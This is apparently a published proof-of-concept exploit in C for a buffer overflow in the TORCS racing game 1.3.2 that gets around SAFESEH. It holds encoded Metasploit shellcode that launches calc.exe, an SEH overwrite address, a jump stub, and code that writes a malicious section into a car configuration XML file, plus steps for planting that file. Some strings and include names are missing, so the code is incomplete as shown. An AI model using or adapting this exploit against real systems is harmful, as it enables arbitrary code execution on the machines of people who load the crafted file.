/* Exploit Title: TORCS <= 1.3.2 buffer overflow /SAFESEH evasion # Date: 07/02/2012 # Discovered and exploited by: Fluidsignal Group -> Research Team Division # Author: Andres Gomez and David Mora (a.k.a Mighty-D) ... Pwn and beans! # Software Link: http://torcs.sourceforge.net/ # Version: torcs 1.3.2 # Vendor notified: 03/02/2012 # Tested on: Windows XP Service Pack 3 Spanish # CVE : */ /* Create template.xml file (see and the end of submission). Place both .c and template.xml files in the same folder. Run the exploit, this will append a 'sound' section in the template file. Move the xml file into torcs/cars/sc-f1/ and replace sc-f1.xml (F1 car Config.) for example. Choose car and run a race. Torcs will then crash. */ #include #include /* Shellcode: msfpayload windows/exec CMD=calc.exe R | msfencode register=ebp -e x86/alpha_mixed -t c */ unsigned char shellcode[] = "\x55\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49" "\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b" "\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58" "\x50\x38\x41\x42\x75\x4a\x49\x4b\x4c\x5a\x48\x4f\x79\x43\x30" "\x45\x50\x45\x50\x51\x70\x4b\x39\x4d\x35\x50\x31\x4b\x62\x51" "\x74\x4c\x4b\x50\x52\x50\x30\x4c\x4b\x50\x52\x54\x4c\x4c\x4b" "\x50\x52\x47\x64\x4e\x6b\x51\x62\x51\x38\x56\x6f\x4d\x67\x51" "\x5a\x54\x66\x54\x71\x49\x6f\x56\x51\x4f\x30\x4e\x4c\x47\x4c" "\x50\x61\x51\x6c\x54\x42\x56\x4c\x51\x30\x4f\x31\x58\x4f\x56" "\x6d\x56\x61\x4b\x77\x49\x72\x5a\x50\x52\x72\x43\x67\x4e\x6b" "\x51\x42\x54\x50\x4e\x6b\x43\x72\x45\x6c\x45\x51\x58\x50\x4c" "\x4b\x51\x50\x52\x58\x4e\x65\x4f\x30\x43\x44\x43\x7a\x47\x71" "\x58\x50\x56\x30\x4c\x4b\x43\x78\x54\x58\x4e\x6b\x43\x68\x47" "\x50\x43\x31\x4e\x33\x4b\x53\x45\x6c\x52\x69\x4c\x4b\x45\x64" "\x4c\x4b\x56\x61\x58\x56\x56\x51\x49\x6f\x54\x71\x4f\x30\x4e" "\x4c\x5a\x61\x58\x4f\x56\x6d\x45\x51\x58\x47\x56\x58\x49\x70" "\x51\x65\x5a\x54\x56\x63\x43\x4d\x49\x68\x47\x4b\x43\x4d\x47" "\x54\x52\x55\x4d\x32\x51\x48\x4c\x4b\x43\x68\x51\x34\x47\x71" "\x4b\x63\x50\x66\x4c\x4b\x54\x4c\x52\x6b\x4e\x6b\x43\x68\x47" "\x6c\x45\x51\x5a\x73\x4c\x4b\x47\x74\x4c\x4b\x43\x31\x5a\x70" "\x4c\x49\x52\x64\x56\x44\x51\x34\x51\x4b\x51\x4b\x43\x51\x52" "\x79\x52\x7a\x56\x31\x49\x6f\x49\x70\x43\x68\x51\x4f\x50\x5a" "\x4c\x4b\x54\x52\x5a\x4b\x4f\x76\x51\x4d\x52\x4a\x43\x31\x4c" "\x4d\x4e\x65\x4d\x69\x47\x70\x45\x50\x47\x70\x56\x30\x51\x78" "\x45\x61\x4e\x6b\x50\x6f\x4f\x77\x4b\x4f\x58\x55\x4d\x6b\x5a" "\x50\x58\x35\x4f\x52\x43\x66\x43\x58\x4d\x76\x5a\x35\x4f\x4d" "\x4d\x4d\x4b\x4f\x4b\x65\x45\x6c\x54\x46\x51\x6c\x45\x5a\x4f" "\x70\x49\x6b\x49\x70\x51\x65\x43\x35\x4f\x4b\x52\x67\x52\x33" "\x43\x42\x50\x6f\x50\x6a\x47\x70\x56\x33\x49\x6f\x49\x45\x50" "\x63\x45\x31\x50\x6c\x50\x63\x54\x6e\x51\x75\x54\x38\x50\x65" "\x45\x50\x41\x41"; unsigned char stage[] = "\x55\x58\x35\x41\x41\x41\x75\x35\x69\x4A\x41\x75\x50\x5D";// ebp = &shellcode unsigned char seh_pointer [] = "\x4E\x20\xC9\x72"; // seh pointer pop pop ret; no safeseh on msacm32.drv unsigned char short_jump [] = "\xEB\x20\x41\x41"; // short jump; int main(int argc, char **argv) { FILE *save_fd; int i=0; save_fd = fopen("template.xml", "a+"); if (save_fd == NULL) { printf("Failed to open '%s' for writing", "template.xml"); return -1; } fprintf(save_fd, "

\n" "\n"); fprintf(save_fd, "\n"); fprintf(save_fd, "

\n"); fprintf(save_fd, "\n"); close(save_fd); return 0; } ===================== TEMPLATE.XML